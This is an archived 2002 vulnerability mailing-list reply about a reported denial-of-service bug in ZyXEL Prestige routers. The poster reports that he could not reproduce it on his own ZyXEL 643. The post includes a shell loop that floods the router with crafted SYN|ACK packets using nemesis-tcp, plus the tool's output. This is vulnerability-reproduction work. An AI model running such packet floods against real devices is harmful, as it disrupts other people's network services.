Sorry moderators, I accidently replied with this to bugtraq, but it should probably have gone to vuln-dev. my apologies. On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote: > ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets. > It is possible to send a packet that will make unavailable > the router's services (Telnet&FTP, DHCP service not tested). > Network traffic isn't stopped. > > Possibly more ZyNOS based routers are vulnerable. Please reply if you > found any other ZyNOS based router vulnerable. I was unable to reproduce this behavior on my Zyxel 643 ADSL router, even under extremely heavy (continuous) SYN|ACK packet flooding to several ports. excerpt of one such test session follows, concluded with ZyNOS information. Immediately after single-packet, during continuous bombardment, and afterwards, I was able to access the configuration menu via telnet. The FTP and HTTP services are disabled on my router, and the only firewall rule is to protect the SNMP Service of the Zyxel itself from the WAN side, as I have a linux 2.4/netfilter box that protects the LAN side of the internal network. Thanks for the heads-up Kistler! --- # while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done [ ...repeatedly... ] TCP Packet Injection -=- The NEMESIS Project 1.32 Copyright (C) 1999, 2000, 2001 Mark Grimes <obecianat_private> Portions copyright (C) 2001 Jeff Nathan <jeffat_private> [IP] xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy [MAC] 00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01 [Ports] 42069 > 40023 [Flags] SYN ACK [TCP Urgent Pointer] 2048 [Window Size] 512 [ACK number] 420 [Sequence number] 420 [IP ID] 0 [IP TTL] 254 [IP TOS] 0x18 [IP Frag] 0x4000 [IP Options] Wrote 54 byte TCP packet through linktype 1 TCP Packet Injected --- ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001 ADSL Chipset Vendor: Alcatel, Version 3.6.70 Standard: G.DMT -- [ rich henning ] /"\ [ henninrpat_private ] \ / X support the ascii ribbon campaign against html e-mail / \ pgp: http://diss0nance.lawngnome.org/pgp_public.txt
This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 20:14:49 PDT